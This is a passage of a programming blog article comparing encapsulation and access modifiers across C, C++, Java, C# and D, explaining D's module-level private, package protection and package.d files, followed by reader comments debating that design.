#include) in which they are declared. Non-static declarations are publicly accessible, usually provided in header files that lay out the public API for clients to use. Static functions and variables are used to hide implementation details from the public API.
Encapsulation in C is a minimal approach. C++ supports the same feature, but it also has anonymous namespaces that can encapsulate type definitions in addition to declarations. Like Java, C#, and other languages that support OOP, C++ also has access modifiers (alternatively known as access specifiers, protection attributes, visibility attributes) which can be applied to
class and
struct member declarations.
C++ supports the following three access modifiers, common among OOP languages:
public– accessible to the world
private– accessible only within the class
protected– accessible only within the class and its derived classes
An experienced Java programmer might raise a hand to say, “Um, excuse me. That’s not a complete definition of
protected.” That’s because in Java, it looks like this:
protected– accessible within the class, its derived classes, and classes in the same package.
Every class in Java belongs to a package, so it makes sense to factor packages into the equation. Then there’s this:
- package-private (not a keyword) – accessible within the class and classes in the same package.
This is the default access level in Java when no access modifier is specified. This combined with
protected make packages a tool for encapsulation beyond classes in Java.
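The two Java levels just described can be seen in a short sketch (the class names here are invented for illustration): a class in the same package can reach both a package-private field and a protected method, no inheritance required.

```java
// Both classes live in the same package (here, the default package).
class Counter {
    int hits;                          // no modifier: package-private
    protected void bump() { hits++; }  // protected: derived classes AND same-package classes
}

public class Main {
    public static void main(String[] args) {
        Counter c = new Counter();
        c.bump();     // legal: protected is accessible from the same package
        c.hits += 1;  // legal: package-private field, same package
        System.out.println(c.hits);  // prints 2
    }
}
```

Move Main to another package and both accesses stop compiling — which is exactly the package-level encapsulation the article is comparing D's module-level privacy against.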
Similarly, C# has assemblies, which MSDN defines as “a collection of types and resources that forms a logical unit of functionality”. In C#, the meaning of
protected is identical to that of C++, but the language has two additional forms of protection that relate to assemblies and that are analogous to Java’s
protected and package-private.
internal– accessible within the class and classes in the same assembly.
protected internal– accessible within the class, its derived classes, and classes in the same assembly.
Examining encapsulation in other programming languages will continue to turn up similarities and differences. Common encapsulation idioms are generally adapted to language-specific features. The fundamental concept remains the same, but the scope and implementation vary. So it should come as no surprise that D also approaches encapsulation in its own, language-specific manner.
Modules
The foundation of D’s approach to encapsulation is the module. Consider this D version of the C snippet from above:
module mymod;

private size_t _count;

void printMessage(string msg)
{
    import std.stdio : writeln;
    writeln(msg);
    _count++;
}

size_t numPrints()
{
    return _count;
}
In D, access modifiers can apply to module-scope declarations, not just
class and
struct members.
_count is
private, meaning it is not visible outside of the module.
printMessage and
numPrints have no access modifiers; they are
public by default, making them visible and accessible outside of the module. Both functions could have been annotated with the keyword
public.
Note that imports in module scope are
private by default, meaning the symbols in the imported modules are not visible outside the module, and local imports, as in the example, are never visible outside of their parent scope.
Alternative syntaxes are supported, giving more flexibility to the layout of a module. For example, there’s C++ style:
module mymod;

// Everything below this is private until either another
// protection attribute or the end of file is encountered.
private:

size_t _count;

// Turn public back on
public:

void printMessage(string msg)
{
    import std.stdio : writeln;
    writeln(msg);
    _count++;
}

size_t numPrints()
{
    return _count;
}
And this:
module mymod;

private
{
    // Everything declared within these braces is private.
    size_t _count;
}

// The functions are still public by default
void printMessage(string msg)
{
    import std.stdio : writeln;
    writeln(msg);
    _count++;
}

size_t numPrints()
{
    return _count;
}
Modules can belong to packages. A package is a way to group related modules together. In practice, the source files corresponding to each module should be grouped together in the same directory on disk. Then, in the source file, each directory becomes part of the module declaration:
// mypack/amodule.d
module mypack.amodule;

// mypack/subpack/anothermodule.d
module mypack.subpack.anothermodule;
Note that it’s possible to have package names that don’t correspond to directories and module names that don’t correspond to files, but it’s bad practice to do so. A deep dive into packages and modules will have to wait for a future post.
mymod does not belong to a package, as no packages were included in the module declaration. Inside
printMessage, the function
writeln is imported from the
stdio module, which belongs to the
std package. Packages have no special properties in D and primarily serve as namespaces, but they are a common part of the codescape.
In addition to
public and
private, the
package access modifier can be applied to module-scope declarations to make them visible only within modules in the same package.
Consider the following example. There are three modules in three files (only one module per file is allowed), each belonging to the same root package.
// src/rootpack/subpack1/mod2.d
module rootpack.subpack1.mod2;

import std.stdio;

package void sayHello()
{
    writeln("Hello!");
}

// src/rootpack/subpack1/mod1.d
module rootpack.subpack1.mod1;

import rootpack.subpack1.mod2;

class Speaker
{
    this()
    {
        sayHello();
    }
}

// src/rootpack/app.d
module rootpack.app;

import rootpack.subpack1.mod1;

void main()
{
    auto speaker = new Speaker;
}
Compile this with the following command line:
cd src
dmd -i rootpack/app.d
The
-i switch tells the compiler to automatically compile and link imported modules (excluding those in the standard library namespaces
core and
std). Without it, each module would have to be passed on the command line, else they wouldn’t be compiled and linked.
The class
Speaker has access to
sayHello because they belong to modules that are in the same package. Now imagine we do a refactor and we decide that it could be useful to have access to
sayHello throughout the
rootpack package. D provides the means to make that happen by allowing the
package attribute to be parameterized with the fully-qualified name (FQN) of a package. So we can change the declaration of
sayHello like so:
package(rootpack) void sayHello() { writeln("Hello!"); }
Now all modules in
rootpack and all modules in packages that descend from
rootpack will have access to
sayHello. Don’t overlook that last part. A parameter to the
package attribute is saying that a package and all of its descendants can access this symbol. It may sound overly broad, but it isn’t.
For one thing, only a package that is a direct ancestor of the module’s parent package can be used as a parameter. Consider a module
rootpack.subpack.subsub.mymod. That name contains all of the packages that are legal parameters to the
package attribute in
mymod.d, namely
rootpack,
subpack, and
subsub. So we can say the following about symbols declared in
mymod:
- package – visible only to modules in the parent package of mymod, i.e. the subsub package.
- package(subsub) – visible to modules in the subsub package and modules in all packages descending from subsub.
- package(subpack) – visible to modules in the subpack package and modules in all packages descending from subpack.
- package(rootpack) – visible to modules in the rootpack package and modules in all packages descending from rootpack.
This feature makes packages another tool for encapsulation, allowing symbols to be hidden from the outside world but visible and accessible in specific subtrees of a package hierarchy. In practice, there are probably few cases where expanding access to a broad range of packages in an entire subtree is desirable.
It’s common to see parameterized package protection in situations where a package exposes a common public interface and hides implementations in one or more subpackages, such as a
graphics package with subpackages containing implementations for DirectX, Metal, OpenGL, and Vulkan. Here, D’s access modifiers allow for three levels of encapsulation:
- the graphics package as a whole
- each subpackage containing the implementations
- individual modules in each package
Notice that I didn’t include
class or
struct types as a fourth level. The next section explains why.
Classes and structs
Now we come to the motivation for this article. I can’t recall ever seeing anyone come to the D forums professing surprise about package protection, but the behavior of access modifiers in classes and structs is something that pops up now and then, largely because of expectations derived from experience in other languages.
Classes and structs use the same access modifiers as modules: public, package, package(some.pack), and private. The protected attribute can only be used in classes, as inheritance is not supported for structs (nor for modules, which aren’t even objects). public, package, and package(some.pack) behave exactly as they do at the module level. The thing that surprises some people is that private also behaves the same way.
import std.stdio;

class C
{
    private int x;
}

void main()
{
    C c = new C();
    c.x = 10;
    writeln(c.x);
}
Snippets like this are posted in the forums now and again by people exploring D, accompanying a question along the lines of, “Why does this compile?” (and sometimes, “I think I’ve found a bug!”). This is an example of where experience can cloud expectations. Everyone knows what
private means, so it’s not something most people bother to look up in the language docs. However, those who do would find this:
Symbols with private visibility can only be accessed from within the same module.
private in D always means private to the module. The module is the lowest level of encapsulation. It’s easy to understand why some experience an initial resistance to this, that it breaks encapsulation, but the intent behind the design is to strengthen encapsulation. It’s inspired by the C++
friend feature.
Having implemented and maintained a C++ compiler for many years, Walter understood the need for a feature like
friend, but felt that it wasn’t the best way to go about it.
Being able to declare a “friend” that is somewhere in some other file runs against notions of encapsulation.
An alternative is to take a Java-like approach of one class per module, but he felt that was too restrictive.
One may desire a set of closely interrelated classes that encapsulate a concept, and those should go into a module.
So the way to view a module in D is not just as a single source file, but as a unit of encapsulation. It can contain free functions, classes, and structs, all operating on the same data declared in module scope and class scope. The public interface is still protected from changes to the private implementation inside the module. Along those same lines,
protected class members are accessible not just in derived classes, but also in the module.
Sometimes though, there really is a benefit to denying access to private members in a module. The bigger a module becomes, the more of a burden it is to maintain, especially when it’s being maintained by a team. Every place a
private member of a class is accessed in a module means more places to update when a change is made, thereby increasing the maintenance burden. The language provides the means to alleviate the burden in the form of the special package module.
In some cases, we don’t want to require the user to import multiple modules individually. Splitting a large module into smaller ones is one of those cases. Consider the following file tree:
-- mypack
---- mod1.d
---- mod2.d
We have two modules in a package called
mypack. Let’s say that
mod1.d has grown extremely large and we’re starting to worry about maintaining it. For one, we want to ensure that private members aren’t manipulated outside of class declarations with hundreds or thousands of lines in between. We want to split the module into smaller ones, but at the same time we don’t want to break user code. Currently, users can get at the module’s symbols by importing it with
import mypack.mod1. We want that to continue to work. Here’s how we do it:
-- mypack
---- mod1
------ package.d
------ split1.d
------ split2.d
---- mod2.d
We’ve split
mod1.d into two new modules and put them in a package named
mod1. We’ve also created a special
package.d file, which looks like this:
module mypack.mod1;

public import mypack.mod1.split1, mypack.mod1.split2;
When the compiler sees
package.d, it knows to treat it specially. Users will be able to continue using
import mypack.mod1 without ever caring that it’s now split into two modules in a new package. The key is the module declaration at the top of
package.d. It’s telling the compiler to treat this package as the module
mod1. And instead of automatically importing all modules in the package, the requirement to list them as public imports in
package.d allows more freedom in implementing the package. Sometimes, you might want to require the user to explicitly import a module even when a
package.d is present.
Now users will continue seeing
mod1 as a single module and can continue to import it as such. Meanwhile, encapsulation is now more stringently enforced internally. Because
split1 and
split2 are now separate modules, they can’t touch each other’s private parts. Any part of the API that needs to be shared by both modules can be annotated with
package protection. Despite the internal transformation, the public interface remains unchanged, and encapsulation is maintained.
Wrapping up
The full list of access modifiers in D can be defined as such:
- public – accessible everywhere.
- package – accessible to modules in the same package.
- package(some.pack) – accessible to modules in the package some.pack and to the modules in all of its descendant packages.
- private – accessible only in the module.
- protected (classes only) – accessible in the module and in derived classes.
Hopefully, this article has provided you with the perspective to think in D instead of your “native” language when thinking about encapsulation in D.
Thanks to Ali Çehreli, Joakim Noah, and Nicholas Wilson for reviewing and providing feedback on this article.
7 thoughts on “Lost in Translation: Encapsulation”
export is also an access modifier.
Otherwise, great article.
It’s listed as one, yes, but it serves a very different purpose from those I describe here, so it isn’t relevant to a discussion about encapsulation.
It’s an interesting article.
I find the mention of ‘expectations’ a little watered down, since C++/Java/C# represent perhaps the 3 most widely used languages on the planet, where private means the same thing in each language – for decades now. In other words, a great many programmers would expect that. It is not a trivial expectation that a language seeking to attract such programmers should dismiss so easily. That such programmers, when they come to D, need to ‘read the documentation’ just to discover that private means something different, seems an unrealistic burden to put on them. But they will surely learn it one way or the other.
But there are other options a programmer might want in D, besides having everything in a module be friends.
For example, non-friend, non-member functions, inside a module with a class.
Two tightly coupled classes, but properly encapsulated from each other, in the same module.
Static, comile time verification of the use of your types interface by other code in the module…
unittests inside the module that cannot bypass the declared interface of your types.
..the list can go on and on… it’s really easy to think of advantages from being able to better encapsulate/hide information, from other code in the same module.
You cannot do simple things like this in D. Not even the ‘option’ is there.
Additionally, there is major push back from the D community whenever there is a discussion about the possibility of making that an option for the programmer.
That’s a real shame, and for me, demonstrates a real weakness in the language.
As your article demonstrates, the best D offers to those programmers, are workarounds.
The argument that private class members in a module are more encapsulated if they can’t be accessed from outside the class boundaries within the module is a weak one. It’s an abstract, purely conceptual idea. From a practical perspective, it just isn’t true. Anyone editing the module has access to those private members. As far as the public API is concerned, encapsulation is maintained. D’s solution is not a “workaround”. It’s a common-sense application of private protection to D’s language-specific features.
The only reasonable argument against this feature that I’ve seen is the one I referred to in the article regarding maintenance. You want to minimize the number of points private members are directly accessed so that when a change is made, there are fewer places that need to be updated. It’s why in Java it’s recommended that private members be access through getters/setters even inside the class. In practice, it’s only going to be a potential issue with extremely large classes maintained by teams over a long period of time. And even then, it’s a rare occurrence and is something that is usually going to be caught at compile time.
Java offers no means of solving this problem other than breaking a single class into multiple classes. Large classes in D would present the same potential issue. It would never go away. Private-to-the-module also presents the same issue, but with the more practical remedy that the module can be split into multiple modules and the public interface remains unchanged.
I suspect you and I have had this discussion many times already, but just in case you actually aren’t who I think you are, I’ll just point out the underlying theme of my post: you aren’t thinking in D. I’ve been programming in D since 2003. I can count the number of voices I have heard raising this feature as a potential issue on one hand. The number I’m aware of who have reported running into maintenance issues because of it is zero.
It’s just not a problem in practice. Step outside this idea of the class as some sacrosanct boundary and you’ll eventually come to see that the module as the unit of encapsulation provides exactly the same guarantees.
I just disagree. When a class defines a private member, and then defines a public method that can be called to operate on that private member, then, the only way to operate on that private member variable, should be by that public method – the defined interface.
It’s a core concept in C++/C#/Java. There are no ifs or buts about it. The compiler in those languages will enforce that constraint, regardless of what code surrounds that class.
Sure, there might be exceptions to that. That’s why C++ got some friends.
Now Walter apparently thought the idea of having friends over here, and over there, is problematic. I agree. But Walter's solution was to make everyone in the module friends – with no ability to unfriend – except through extensive redesign of how and where you lay out your code (i.e. the one-class-per-module thing).
I tell you, I much prefer to have the ability to define friends, than not have the ability to unfriend – in life, as well as in code.
Now you’re telling me, I’ll be fine if other code in the module can just ignore those interface constraints you went to some effort to design, because I have control of that other code in the module?
How can I take that argument seriously, I mean gee!
Just ask Scott Meyers, how many mistakes are in his books, despite the really extensive effort he and others go to, to not have mistakes.
The compiler should prevent you from making such mistakes. The language shouldn’t be telling me, ‘you’ll be fine, you won’t shoot yourself in the foot – just trust yourself that you’re writing correct code’. No! I don’t trust myself from not making mistakes.
So, sorry, but I just cannot take that argument seriously.
And anyway, if D really is a ‘multiparadigm’ langauge, then it shouldn’t demand that I ‘think in D’.
” the only way to operate on that private member variable, should be by that public method”
This is about convincing as “you shouldn’t eat meat on Fridays”. And the rest of your post is similarly lacking in fact or reason. Extending the scope of privacy to a module means that accessing private data within the module is *not* a mistake. That’s very different from Scott Meyers having content errors in his books … talk about an argument not to be taken seriously. And your last sentence makes it clear that you aren’t.
The access modifiers in C# are badly botched, and I’m not just talking about “protected internal” which, in violation of all expectations about adjectives, means protected OR internal … the union of the two access scopes. Remarkably, if you have a virtual protected method in your base class , you can only access it in a derived class via `this` … you *cannot* access it via some other object derived from the base class, because the method may be implemented by a class not derived from yours, so you’re peaking at something supposedly “protected” from you. This nonsense requires you to broaden the access to internal or public even when it’s strictly local to the source file. I’m glad that D has discarded this sort of mathematically strict but pragmatically pita silliness. Some languages, like Nim and Ceylon, have gone further and recognized that the whole idea of “protected” is bogus: | https://dlang.org/blog/2018/11/06/lost-in-translation-encapsulation/?replytocom=6735 | CC-MAIN-2020-50 | refinedweb | 4,021 | 55.03 |
Various releases to change how a test is run (such as adding new exceptions that should be treated as specific outcomes – python unittest uses exceptions to signal outcomes).
In testtools 0.9.2 we have an answer to both those issues. I’m really happy with the data included in outcomes API, ‘TestCase.addDetail’. The API for extending outcomes works, but only addresses part of that issue for now.
Subunit 0.0.4, which is available for older Ubuntu releases in the Subunit releases PPA now, and mostly built on Debian (so it will propogate through to Lucid in due course) has support for the addDetail API. Subunit now depends on testtools, reducing the non-protocol related code and generally making things simpler.
Using those two together, bzr’s parallelised test suite has been improved as well, allowing it to include the log file for tests run in separate processes (previously it was silently discarded). The branch to do this will be merged soon, its just waiting on some sysadmin love to get these new versions into its merge-test environment. This change also provides complete capturing of the log when users want to supply a subunit log containing failed tests. The python code to do this is pretty simple:
def setUp(self): super(TestCase, self).setUp() self.addDetail("log", content.Content(content.ContentType("text", "plain", {"charset": "utf8"}), lambda:[self._get_log(keep_log_file=True)]))
I’ve made a couple of point releases to python-junitxml recently, fixing some minor bugs. I need to figure out how to add the extra data that addDetails permits to the xml output. I suspect its a strict superset and so I’ll have to filter stuff down. If anyone knows about similar extensions done to junit’s XML format before, please leave a comment
Syndicated 2009-12-20 12:33:08 from Code happens | http://www.advogato.org/person/robertc/diary/131.html | CC-MAIN-2014-35 | refinedweb | 309 | 53.81 |
Errors when plotting zeta function parametrically
I have the following piece of code:
def f(x): return(real_part(zeta(1+x*I)).n()) def g(x): return(imag_part(zeta(1+x*I)).n()) parametric_plot([f(x),g(x)], (x,2,10))
It should be moderately clear what I'm trying to do - I want to produce a plot of Riemann zeta function on the line Re(z)=1 using parametric plotting. However, when I try to plot this, I get an error
TypeError: cannot evaluate symbolic expression numerically. I also tried the same thing without the
.n(), but then I get an error
TypeError: unable to coerce to a real number. I couldn't find any help online.
It's worth noting that trying to plot function f(x) I get the same error with
.n(), but it works just fine without it (as opposed to parametric plot). Does anyone have an idea how to fix the issue?
Thanks in advance. | https://ask.sagemath.org/question/34882/errors-when-plotting-zeta-function-parametrically/ | CC-MAIN-2018-39 | refinedweb | 161 | 58.99 |
#include <TestResult.h>
Inheritance diagram for CppUnit::TestResult:
A single instance of this class is used when running the test. It is usually created by the test runner (TestRunner).
This class shouldn't have to be inherited from. Use a TestListener or one of its subclasses to be informed of the ongoing tests. Use a Outputter to receive a test summary once it has finished
TestResult supplies a template method 'setSynchronizationObject()' so that subclasses can provide mutual exclusion in the face of multiple threads. This can be useful when tests execute in one thread and they fill a subclass of TestResult which effects change in another thread. To have mutual exclusion, override setSynchronizationObject() and make sure that you create an instance of ExclusiveZone at the beginning of each method. | http://cppunit.sourceforge.net/doc/1.8.0/class_cpp_unit_1_1_test_result.html | crawl-002 | refinedweb | 129 | 53.21 |
#include <CCAENV262Busy>
class CCAENV262Busy : public CBusy {
CCAENV262Busy(uint32_t base, unsigned crate);
CCAENV262Busy(CCaenIO& module);
CCAENV262Busy(const CCAENV262Busy& rhs);
virtual void GoBusy();
virtual void GoReady();}
This class uses the CAEN V262 I/O register to provide signals needed to implement a computer busy. When you use this module, module outputs have the following meanings:
Note that SHP0 is not a hardware signal. It means that the computer is about to be busy due to data taking stopping or pausing. To use this module you must have an external latch or gate generator in latch mode. The latch should start on the OR of the master trigger and SHP0 it should clear on SHP1.
The module clears are a convenience output and need not be used, however if you can use them, this is quicker than clearing modules in software.
CCAENV262Busy(uint32_t base, unsigned crate);
Construct a busy object.
base is the
base address of the V262 module and
crate the
VME crate in which the module lives.
crate
is an optional parameter that defaults to 0.
CCAENV262Busy(CCaenIO& module);
Constructs a busy object.
module is a
refererence to a
CCaenIO module that
has already been constructed and will be the busy hardware
controlled by this object.
CCAENV262Busy(const CCAENV262Busy& rhs);
Copy constructs a new busy module that is a functional
equivalent to
rhs.
virtual void GoBusy();
Called by the framework to indicate the busy should be asserted. This is not called in response to a gate. Busy in response to a gate must happen at hardware speeds, not software.
virtual void GoReady();
Called by the framework to indicate it is able to react to the next trigger. | http://docs.nscl.msu.edu/daq/newsite/nscldaq-11.0/r71468.html | CC-MAIN-2017-30 | refinedweb | 276 | 62.88 |
Documentation
¶
Overview ¶
The importers package uses go/ast to analyze Go packages or Go files and collect references to types whose package has a package prefix. It is used by the language specific importers to determine the set of wrapper types to be generated.
For example, in the Go file ¶
package javaprogram
import "Java/java/lang"
func F() {
o := lang.Object.New() ...
}
the java importer uses this package to determine that the "java/lang" package and the wrapper interface, lang.Object, needs to be generated. After calling AnalyzeFile or AnalyzePackages, the References result contains the reference to lang.Object and the names set will contain "New".
Index ¶
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
This section is empty.
Types ¶
type PkgRef ¶
PkgRef is a reference to an identifier in a package.
type References ¶
type References struct { // The list of references to identifiers in packages that are // identified by a package prefix. Refs []PkgRef // The list of names used in at least one selector expression. // Useful as a conservative upper bound on the set of identifiers // referenced from a set of packages. Names map[string]struct{} // Embedders is a list of struct types with prefixed types // embedded. Embedders []Struct }
References is the result of analyzing a Go file or set of Go packages.
For example, the Go file ¶
package pkg
import "Prefix/some/Package"
var A = Package.Identifier
Will result in a single PkgRef with the "some/Package" package and the Identifier name. The Names set will contain the single name, "Identifier".
func AnalyzeFile ¶
func AnalyzeFile(file *ast.File, pkgPrefix string) (*References, error)
AnalyzeFile scans the provided file for references to packages with the given package prefix. The list of unique (package, identifier) pairs is returned
func AnalyzePackages ¶
func AnalyzePackages(pkgs []*packages.Package, pkgPrefix string) (*References, error)
AnalyzePackages scans the provided packages for references to packages with the given package prefix. The list of unique (package, identifier) pairs is returned | https://pkg.go.dev/github.com/iRezaaa/mobile@v0.0.0-20191126111539-45e4d750f768/internal/importers | CC-MAIN-2021-49 | refinedweb | 323 | 50.12 |
In my company there is a sophisticate logic layer in Sql Server DB. In order to write tests that will check this code we need to write some T–SQL code. The test methods including a serious of initialization script before and after each one of them. I’m going to share you with a very helpful way to debuging this important code by using SQLCLR abilities.The first thing we should do is to open a new Sql Database Project.
Create a new SQL Server Project, by adding a new project and selecting SQL Server Project Template.
Then we need to add our stored procedure that will run inside the db(using SQL-CLR engine). Lets write a very simple stored procedure (It help us to focus on the global concept).
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void InsertCustomerStoredProcedure(SqlString name)
{
using (SqlConnection connection = new SqlConnection("context connection=true"))
{
SqlCommand command = new SqlCommand();
command.Connection = connection;
command.CommandText = "insert into customers(name) values(@name)";
command.Parameters.Add(new SqlParameter("name",name));
connection.Open();
command.ExecuteNonQuery();
}
}
};
The next step will be a compliation and deploy to the central db.In order to test this code we should used a sql file from the “Test script” library(One of the solution directories).
I added an executable command there. This command is excute our stored procedure:
As you can see, I added a breakpoint in the stored procedure execution line. When I will run this project in “debug” mode the visual studio will stop here.
Ok, something is missing. When I tried to execute it I got this error:Msg 6263, Level 16, State 1, Line 6
Execution of user code in the .NET Framework is disabled. Enable "clr enabled" configuration option. This stored procedure will get a customer name as an input and insert it into the customers table.
That's means that we must enable the SQLCLR debug option in our DB if we want to debug code that is being stored inside it.
The “flag” that indicates about this configuration key exist inside the db. You can look at the current Sql CLR flag by execute this command.
In order to enable the SQL CLR debugging just executes this stored procedure:
exec sp_configure 'clr enabled', 1 reconfigure with override
It's time to start debugging our code. Click the “start debuging” button. The visual studio will stop on the fisrt breakpoint. And after we click on the “Step into” button we will enter directly into our stored procedure implementation but this time in debug mode.
When I'll open the Customers table, we will see that the insertion operation that has been executed in the stored procedure was succeeded.
Furthermore, inside a test script file you can also debug existing stored procedures even if they have been created as normal stored procedures directly in the db. You can step into them in debug mode and see all the parameters that you gave them in the watch window.
So, if you need to debug a sophisticated code that was written in stored procedures it’s really recommended to use this debug abilities to track the flow easily. | http://blogs.microsoft.co.il/aviwortzel/2007/09/30/how-to-debug-a-stored-procedure-in-your-sql-server-2005/ | CC-MAIN-2018-09 | refinedweb | 544 | 57.57 |
React Native is a JavaScript framework that allows you to build cross-platform mobile apps that feel truly native and run smoothly on iOS and Android. React Native arose from React, which offers a pattern for building web and mobile user interfaces in a declarative, efficient, and flexible way.
Both open-source libraries are maintained by Facebook and a community of independent developers. React and React Native have been successfully adopted and are actively being used by a number of corporations such as Airbnb, Buffer, Bleacher Report, Feedly, HelloSign, Imgur, and Netflix.
Unlike other cross-platform development solutions (Cordova, Ionic, or Titanium, for instance) that use webviews for the graphical interface, React Native uses its native rendering APIs in Objective-C (iOS) or Java (Android), so your app renders using native views. This lets developers build nice cross-platform experiences without losing any quality in UI performance.
React Native makes Java’s “write once, run anywhere” slogan reality, except for the fact that JavaScript is used.
We’ve already been experimenting with React Native for a while; these experiments have resulted in a number of interesting components. This time, however, we’ve decided to create something really special and useful...
The Template Project
To optimize our development processes and provide our clients with high-quality products, we wanted to create a robust template app that would work properly on both platforms – Android and iOS – and that could be used as a base for our future projects. As you might have guessed, we used React Native to bring it to life.
Our React Native Template Project contains user flows that are common to almost all apps. These flows include:
Item list
Item details
The project is now available on GitHub, so you can easily check it out.
This article isn’t a detailed tutorial on how to implement these flows in React Native. On the contrary, this article reveals the basics of React Native – we’ll take a look at some regular patterns as well as helpful JavaScript libraries that can be used to create a React Native app.
React Native knowledge base
Components
If you aren’t familiar with React Native, you’ll need some basic knowledge to get through the rest of the article. This section will also give you some understanding of common development patterns and reasons why we used them in our development process. Let’s start with the basics – React Components, a concept also used in React Native.
A React.Component object is the smallest atomic unit of a graphical interface. A component takes parameters (called “props”) and returns the view hierarchy to the display via the render method.
export default class RepositoryListItem extends React.PureComponent { _onPress = () => { const {navigate} = this.props.navigation; navigate(consts.REPOSITORY_DETAILS_SCREEN, {repository: this.props.repository}) }; render() { return ( <TouchableHighlight onPress={this._onPress}> <View style={itemStyles.itemStyle} {...this.props}> <Text style={itemStyles.itemTitleStyle}>{this.props.title}</Text> <Text style={itemStyles.itemDescriptionStyle}>{this.props.description}</Text> </View> </TouchableHighlight> ) } } }
Each item in the hierarchy is a component that, in turn, takes its own props and contains other components.
With this approach, we can create an app based on modular and reusable blocks.
The component lifecycle
Each component has a lifecycle and state. Whenever these change, the Render method is invoked.
We have to control the modification of our data to prevent unnecessary rendering of the user interface. To deal with this, we chose the Redux architecture.
The Redux library
In the previous section, we explained that when you create an app using React, it’s essential to keep data in a consistent state. Redux helps us do that.
The UI state is complex – we need to manage active routes, selected tabs, spinners, pagination controls, and so on.
Managing this ever-changing state is hard. If a model can update another model, and then a view can update that model, which updates another model that, in turn, may result in another view being updated... At some point, you no longer understand what happens in your app as you lose control over when, why, and how its state changes. When a system is opaque and non-deterministic, it’s hard to reproduce bugs or add new features.
Redux offers a solution to create a single global state for the whole app; this solution is called store. Each component can initiate an action to change the store. Each component that observes the state of the store receives new data in the form of props when the store is changed.
The Saga library
Many mobile applications have to send requests to the backend or a database. These operations usually take a long time and bring side-effect data to our store; for such cases, the Redux architecture provides synchronous and consistent performance.
To optimize this process, we can use middleware, an intermediary between two events: the sending of an action and the receiving of that action by the reducer. In fact, middleware is actually a function that takes
store as an argument, returns a function that takes the
next function as an argument, and then returns another function that takes an
action as an argument.
const someMiddleware = store => next => action => { ... }
The next function plays a crucial role. We call this function when our middleware is done with the task we’ve assigned it. This function sends our actions to our reducer or other middleware. As such, we can perform asynchronous operations inside middleware.
We chose the Redux-Saga library, which allows us to create such middleware and provides useful functions to easily deal with Redux.
Redux-Saga provides the middleware function, which is implemented as a Generator function (this is a JavaScript concept that aims to make asynchronous tasks synchronous and consistent).
As we can see, using the
yield keyword (used in
Generators) and some functions from the Redux-Saga library, such as
take,
put, and
call, we can intercept actions from components, send requests to the backend, and make the process of dispatching actions synchronous and consistent.
export function* loginFlow() { while (true) { const {username, password} = yield take(actions.LOGIN_ACTION); yield put({type: actions.PROGRESS, progress: true}); yield call(authorize, username, password); yield put({type: actions.PROGRESS, progress: false}); } }
The Immutable library
Redux uses reducer functions to perform changes within the
store, so when a reducer function catches some action, it creates a new object that holds a new state. Why does this object have to be new? Because this way we can compare references to two different objects (a new object and an old object); moreover, it’s much simpler than comparing object contents.
At the very least, we have to create a new object using the Spread operator:
function todoApp(state = initialState, action) { switch (action.type) { case SET_VISIBILITY_FILTER: return { ...state, visibilityFilter: action.filter } default: return state } }
We decided to use the immutable.js library because it guarantees immutability and does much of the heavy lifting behind the scenes to optimize performance and memory consumption. Our reducer function looks like this:
export default function loginReducer(state, action = {}) { switch (action.type) { case actions.ACTION_LIST_ERROR: return state.withMutations(state => state.set('loginError', action.error)); case actions.ACTION_LIST_SUCCESS: const data = action.page === 1 ? action.list : state.get('data').concat(action.list); return state.withMutations(state => state.set('data', data)); default: return state } }
Platform-specific UI elements
As far as native UI development goes, we need to stick closely to a native platform’s rules. In other words, there should be no difference between a UI created in a native language and a UI created using React Native.
React Native has many components you can use to create great user interfaces. These components, in turn, support many style parameters that allow us to customize the look and behavior of the UI. However, these components are usually not enough to create a robust UI.
To fix this lack of native elements, we used the Native-Base library, which contains many platform-specific components.
[Platform-specific UI elements for Android]
The Native-Base library allows us to use one component for both platforms without any extra adjustments.
We can also use the power of the Flexbox container, which is an effective and flexible tool for placing UI elements. This is applicable to both React Native’s standard UI elements and elements provided by Native-Base.
What else can our template do?
We wanted to create a project that covered the majority of our use cases. However, there are also system flows that usually happen behind the scenes.
We also gathered common tasks we always face, such as string localizations, maps, animations, permissions, icons, networking, data persistence, and so on, and put them into our Template Project as well.
We studied loads of open source JavaScript libraries to find the most effective solution for this project, all of which we’ve mentioned in this article.
Our goal was to create a template that supports our most commonly used flows. We ended up with a robust app for both Android and iOS.
React Native has proved once more to be an excellent tool for creating great mobile apps in a short timeframe.
Our project is free to access on GitHub, and we hope it will be useful for you. Of course, we’re going to improve and update our template, and we’re always glad to hear any suggestions or comments from other developers. | https://yalantis.com/blog/how-we-created-a-universal-template-project-in-react-native/ | CC-MAIN-2018-09 | refinedweb | 1,557 | 55.13 |
Everyone knows that storage
growth has been at growing exponential levels for a few years now within
enterprises, and as a subset of data unstructured data is growing faster than
structured (tabular) data.
How are you handling the
unstructured data growth?
One option is via Global
Name space (GNS) (Please don’t confuse that with the old Novell IPX GNS ((Get
Nearest Server)) yes acronym reuse is fun.)
What is GNS?
Put in simple terms it will
do to file storage what DNS did for IP networking.
Or put another way GNS enables
your clients to access files w/ out knowing the exact location Or put yet another
way it’s federation of a File System (F/S).
The official industry definition
goes like this… A Global Namespace (GNS) has the unique ability to aggregate
disparate and remote network based file systems, providing a consolidated view
that can greatly reduce complexities of localized file management and
administration.
Global Namespace technology
can virtualize file server protocols such as Common Internet File System
protocol (CIFS) and the Network File System (NFS) protocols.
So, you might be asking
yourself how does global namespace help my enterprise? How many mapped drives to you have (UNIX
& Windows)? How many more mapped
drives do you need to add?
How much time
do you spend just managing mapped drives?
How much time do you spend managing file locations? How much time do you spend performing cross
mapping searches?
Now multiply that number by
the number of admins and users who perform similar work in your enterprise.
How much time do you spend working
policies and access rights to these files?
Another benefit of GNS is
the ability to tie GNS into Microsoft’s DFS to ease your administration load
there too.
You will find lots of
competitive global namespace products out there in the market for you to select
from such as (IBM SONAS, Brocade StorageX, F5 Networks, etc, just to name a few)
Happy Productivity Increase! | https://www-304.ibm.com/connections/blogs/DataCenter7/tags/windows?lang=en_us | CC-MAIN-2014-10 | refinedweb | 330 | 61.56 |
Please post corrections/submissions to the MVC Forum. Include MVC FAQ in the title.
MSDN articles with full project samples (VB and C#) (MVC 2)
MVC Best Practices
Kazi Manzur Rashid’s MVC Best Practices (great 2 part series)
Post LINQ to SQL questions here. Post Entity Framework questions here.
Q: Should I start with MVC 1 or MVC 2?
